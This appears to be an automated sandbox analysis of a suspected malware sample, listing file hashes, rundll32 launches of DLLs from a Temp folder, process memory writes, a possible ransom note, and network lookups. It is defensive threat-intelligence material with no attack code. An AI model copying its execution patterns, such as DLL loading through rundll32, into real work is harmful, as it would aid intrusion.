| SHA512 | c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f9963a1618d6458ee89ae77ac559c8e4 |
| SHA1 | a2b95ca3e9e0d9e5d564f4c04e6c193d35fa0101 |
| SHA256 | bd2bd0dbac571dc8000739d8f61d00a1c0682e44babad869a88c67c3cff8f44d |
| SHA512 | 1d7b4dc00d4a91300c6739a9012f3bf081603e3432a94cb0e49c263e05feefa6b227b1f4f7cc223c5d6228abd3c3fccfd743b6700c351b98386e810385a02209 |
\Program Files\7-Zip\7-zip.dll
| MD5 | 8af282b10fd825dc83d827c1d8d23b53 |
| SHA1 | 17c08d9ad0fb1537c7e6cb125ec0acbc72f2b355 |
| SHA256 | 1c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca |
| SHA512 | cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f9dc26704da07c4fb9b72d27e9f1268e |
| SHA1 | 5beb50fa7dcf9e01aacfe2515014f66510fb985b |
| SHA256 | 3881fb4c16119d039cba801214401ef4bc91c761453b59c72c5c1da23bcdde5c |
| SHA512 | a5e11bc86897bcde36d4a641545504875f71dd7d465d1a6b5461c2ace78558737a2b4d67a8d1c6a2507fcc224cc76b632ad34d98ab5541acf99a8797767ec5eb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4cf58c14f20b0346c58a758fa11bfd2f |
| SHA1 | c142f1e2dd9cecd1de45e83859b294d1bad77229 |
| SHA256 | 832a864e7b95e32c54c933b7767246b05fe3a7bc0b65ae7858833ffcc502e67d |
| SHA512 | 96f572683cd4cdce1654717cb1356fda9d3bb464b657e8a7dcbd20b28e34629cb688c3ad1bf225aef832018871440a6fe49971cbfb28fe8643d8f9645feb8867 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | a0a5ff2e6e9ef7d820ca42d09a660e8c |
| SHA1 | fcb25c451672458b937480a286cd61970b58ba55 |
| SHA256 | 27dd5ae1e86e4ed32fdebff38ed4332a040ce765141b014255377d0315a73a85 |
| SHA512 | 8ea88314261582ff254a5b5885f440299fc8d98be5298b421a381e5d5974667c43ecced1de5aee617d8385ae64def9919f7305d4fc6938b9ac99a3a6cbf7dc5d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5a15ac.TMP
| MD5 | 9dae7a25384a7bdd810b501544b77a94 |
| SHA1 | fc55bd5221171dc4e5853cdf3ab39fc3c7560617 |
| SHA256 | 2db0c8d1e0fa0940af7f2e789d2baf8a0d8f12cc38ced16a9289d8ecf3587f16 |
| SHA512 | c33f0668e98e2637065bb0363a8713781749d89cfd424599ea4f5437280e00904a8b03eb07a0ae73afecc1ef24240fd6384d68f7e14fe90931bc02d53552bbf2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 93eeb0756fd70dfb396f659e8cf1b537 |
| SHA1 | 0a2a5391c99e1a3aa230c24667abb645555ba8ba |
| SHA256 | 4ffe7d0b85352781f07c49ce8621aa417db3d2acc246ac5854ae369879852010 |
| SHA512 | 1fd4cd9898a58e2faeb1d96c518b703a9936cc979afafb8aae21ebb6f5be00bac12838359f0c4c49bfb1eff29e1369986731ecc9f05561b326fb219bca5b6d82 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | ae1bccd6831ebfe5ad03b482ee266e4f |
| SHA1 | 01f4179f48f1af383b275d7ee338dd160b6f558a |
| SHA256 | 1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649 |
| SHA512 | baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5a4bef.TMP
| MD5 | 0619b3bedb6ecfbeb1af55458dea42e3 |
| SHA1 | 68c3af847e49db57683339d1b768833f7f1e61be |
| SHA256 | bbe84cbe0a63d7dd529b2511a12df1a5608be82bb24e0cd02d6bb92699ee3c09 |
| SHA512 | 9319f1394a6b87a1f427a9b781dce42d7f68c8764062eec8d6500da9ea3e201e3775a1f92796d7f75f63b01223e8a325c769be993ac5fd359d5046fb29ad12e9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 34d4b17bd203ac807b6d7cde30599ac0 |
| SHA1 | fc497999b0a269d590317fd3aad1abd96d3a0472 |
| SHA256 | 6b460670ad1c2c0f74c40b66aa24a0cbeebb0b0e95475758ad10911d0939369d |
| SHA512 | dc545ecc2d6c6110a3b0e862097201fa5f0b86c1531a4c4c69b96bbc9e0f8ba5c6f6e9947964ed84c5c9726ff1ca8d3486162e8cbe8d37c77e1fba16aece5626 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 18bba9dd6808199233d001996193daf9 |
| SHA1 | dc5a01485d8334f560daad3555827327dca5e80c |
| SHA256 | 3e9ba9a4e528147effd37ad85a0cc100cfc61c5865d4134ab730ce4ad65c017f |
| SHA512 | b4cb58c597f210db1467b4bc9b72c321b5f314e068cf9819aab875d0d1855109fe483869197bdc29070378161388a182110a43da6dc489235914e739227ca1b9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 149e5896f39ea962ee4e43e00cbb719d |
| SHA1 | 61f37f8c76443faf4818fdafd7a586d73da84e56 |
| SHA256 | 7ce5e23f4bfe3c1c0088c614e5be6d55493a3c95bd3124fd94bce0ddfa6c4ce5 |
| SHA512 | b8011e37a38eb17935ded3237a87c53338752b0450315f03cd280a08b5917340933ca75ef4e7eef2f22efb8c715e538a288c9b0df5123c851f256fe8c83a239a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | dcd05c00279183de899bf36573e96657 |
| SHA1 | 1c4dc09532b555ac6669fef9435adfb5e6ce6f51 |
| SHA256 | c59399f40fb66c2de27eee722f846dadeef42e1a65a536d309818ff2153c14b6 |
| SHA512 | 25ccb0f0da41665a69264aa1a74566f198ac037cab105f9ec6f673c31b14f3d88b2b99e1f8c46249d738dba13179f4fdbe04a5ca6a67edd24cd424045a98939f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | a533dbee2b1018dda1d1d70c767981c1 |
| SHA1 | 462c11a894b013cc853daf3f158f4e3fecf5f9cf |
| SHA256 | ba5a4c65fbd05f92399cecb84f2eaf6855ca4d674a25a2a40c109214b2c1aae3 |
| SHA512 | d3283901ba2e26cb538bccb760b905137799c01b9a38d76a259557e6acfb4c4e051a74d8b86f10d8768b3f1cf704dc6a22623b9a9fc1bc367fa26cce9b94a197 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 42722595c5cf2cf703bf0b5b3e213d5a |
| SHA1 | 60b42e133740423754534db5ffd91df6762ac39d |
| SHA256 | 000e35848937e0132ed037079d0adb1a2b444db7f9866e442269f33efc2eaf15 |
| SHA512 | 30e25f1d2f7798c46b0c4c7c2c54edc3a22b668cf69d9daf33885e90fbb10409e457c0ab616a87bfc91db95e9100c5e6bfd0899fdf602ca6a2a244931b9092a1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir4332_930806541\Icons Monochrome\16.png
| MD5 | a4fd4f5953721f7f3a5b4bfd58922efe |
| SHA1 | f3abed41d764efbd26bacf84c42bd8098a14c5cb |
| SHA256 | c659d57841bb33d63f7b1334200548f207340d95e8e2ae25aac7a798a08071a3 |
| SHA512 | 7fcc1ca4d6d97335e76faa65b7cfb381fb722210041bdcd3b31b0f94e15dc226eec4639547af86ae71f311f52a956dc83294c2d23f345e63b5e45e25956b2691 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index-dir\the-real-index
| MD5 | fcb898b34dccc68f1f5744ed54552286 |
| SHA1 | 2eaf8dcd42eb4a35fa6428450878b85a6c668e1d |
| SHA256 | c9cd200684c671e5ed98b8e3e6361186b55380a4fb946336c6b1517a80567063 |
| SHA512 | 1d5e2a01c1d3c24ff5d2f8a31f9b32459fae1fd6b446d177944c98ef717599f6fc5decb770edd43cf047b4d02981bee960b8d98cdeb28eafff0976f0af1fb597 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index-dir\the-real-index~RFe5a6831.TMP
| MD5 | 6cfdd6c65dc3042708071429f7f63d49 |
| SHA1 | 1ba1ca71fe378f2cf0563f504dc4a6d2157e5ec1 |
| SHA256 | bdc17775bd53acc6e492fb9e3b8111b73ab2fb6c79715eb62c517180090471d7 |
| SHA512 | cde1842e43d169025f218d94e9c1a1740972e9088e942eb07f24ca1198fbf166c4b9db3bd54b935b5739ada8a078bb71dd33fbb9d6df746ba227e7e83459058f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000022
| MD5 | cd3756106418d9e83a2baff9904ba221 |
| SHA1 | 4c2ed1c1ebe119027db0fbaf7a64b408f1779b4a |
| SHA256 | 57ec0895e1bcaf08c769e2d6872f3f3657972f87fac081063445213dae4541ee |
| SHA512 | 5bf43ccaaf99505f7e8ecf2eda18efe260125accbc12f655601e2acabd822513e153f4b81cbf03a65d13572f11e9f13fd471006a0ce8f2665e8a594ff2d769dd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b6076ddd0896c4ef07d9d907ec0ccffe |
| SHA1 | 83ef97d88f6ca25b1781587040ca676da4187228 |
| SHA256 | 3137611b3a24ea83c7eff1df6226b4594b2da048759bbf7cf8f69505f9c4e773 |
| SHA512 | 1140f45c628e1ac5f114f443fae946a08d86013fd5f05f2a1f2718df9346efb3b2eb02989119b49a92c4f69b7147aeae9c48827e23902c14965b6bad4c5d9e32 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | e43b5a9489450c3a906ac4e5ec6d6edd |
| SHA1 | c0b6511fb9a8b6aff4f152c792a98d31fcadcb07 |
| SHA256 | aa61cbed1515ade8c09e95bd423ca53e6b002388641e93996f01929b38795d0c |
| SHA512 | 6a88c8bba007dd9ec99cbbfee1e7bf40caf7c6e9a9f597e351656054fc3b06ed0a14f4b37c9015c50bdc47448623422e34b9dc02a5cfb98433016494166e40f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | fc4387d666a2d5d88dd7f74c8f9d68b8 |
| SHA1 | 06214eb04646b1904b6073e484ba222f161f37be |
| SHA256 | a4d93d9aacd6b97422248a1dcdb7cf74bec3e4ba58e6397e2c17a8137085fd8b |
| SHA512 | ae228fb9c460f4a435485322a57d7a54d1be8c8ddc759666368959bd9c505c6e316f035c059ef3c04d10cd32db434947bf5cf5904658c8a0393b80af7c6d83ed |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 87aef95f72269523be9295d2b6d91147 |
| SHA1 | 48bd563631f121b991ee40998c6bf7979b5326f0 |
| SHA256 | 5050093b05eeafccae81c6a349499cab79989997e04f01338fb258afda5e48ac |
| SHA512 | 775ea3909c57003b3f7448abb1f7c186127fb429b9c863f8a9001e818ff6227fe51e1d2e941344295d0b9e8045d10477a5c03284d9726db797fa1d79306bb86d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f
| MD5 | c0637a08f2ba40c56260782d2bb3ace4 |
| SHA1 | a2bf4298414a764ff1342b3f48f45b4dc1669a96 |
| SHA256 | d6ab12688ec8cfe7f9235b18c7d7a4730d86278ba1efae0d715c0d054465781e |
| SHA512 | 736d1ac8987102028baef59d43ceb2fde71b3aab2f8f2d8d306846a457e2ac224908968ff7bfe34bb05beb7998223d393244cf5da84f9d64f8b71c9f0b2ca6e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021
| MD5 | af5bf693b92c0d2c8441b3a6640c4ad8 |
| SHA1 | 12ed4ac73239e542ab8d7fa191dddc779808e202 |
| SHA256 | b9f2c3f2ec75955d96309f759eaf9fb6bf576c238377491dbb92de1768a26012 |
| SHA512 | c2ef099832fc5e8f1e67acbd550b0590c0fb5c291761280a2e74e6a97763906b9c0c1a2295f285462ba3a0ed7cd5658f296e5f0f9c5d11a97ba210f352f8a438 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001c
| MD5 | 127b7a9f7009939d0ae5dd1a48386985 |
| SHA1 | f9e981f2fbc6df7e304803153fb6fe40f0dcb6ac |
| SHA256 | 9d8e3219c036313e8b27ecb7b91befc49de6a32352a5349656945a7525a89962 |
| SHA512 | b1a442d78f6adc7a67f8ee299d46817309798ff2a38a66af2ff03eaa276b3a7967fde34e801dc8488ed75b3110fd01b3a9763f792ce75e21fae190d4779c1287 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f59459fcda8df0c834f4ab23336c96e7 |
| SHA1 | e2c5ce89cd38fdab552008015426fdca30f15c07 |
| SHA256 | 96c32d5c4b8c6c59713aaac3f3d43ddfcd37ddf548feffbc75b1d1fd21dba1cb |
| SHA512 | f0498022c2d5a66f66088390ba793df030bbdf614f723b3038e624992fac1c19c36a61177d5893e8da046e6a7fa1315f263789fb534a5190439466f5d763f8c1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7109a0b4eb6d946ff017179aa1387fbc |
| SHA1 | ad6d5de96c35028c4350b7d1b39e28b0b9a1c0f1 |
| SHA256 | a4c4ed07cf8c104977ff5d6d45d57e746fc067528a8e2b51e6affd9393f16939 |
| SHA512 | 17d211bc4aab2bc82429955e6e77caf7ac4e48420b7fd70eda9f19713d24d4f42f92957b052586bea75519a77b81c72604dd8a5fa0b29dca15aafee1f6f0fd6d |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
132s
Max time network
136s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Settings.ini
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.150.79.40.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
133s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3d9xx.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240611-en
Max time kernel
52s
Max time network
61s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3360 wrote to memory of 4712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3360 wrote to memory of 4712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3360 wrote to memory of 4712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1
Network
| Country | Destination | Domain | Proto |
| GB | 87.248.205.0:80 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
132s
Max time network
135s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\licension.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
132s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\open me - 1212.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
130s
Max time network
137s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.10.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |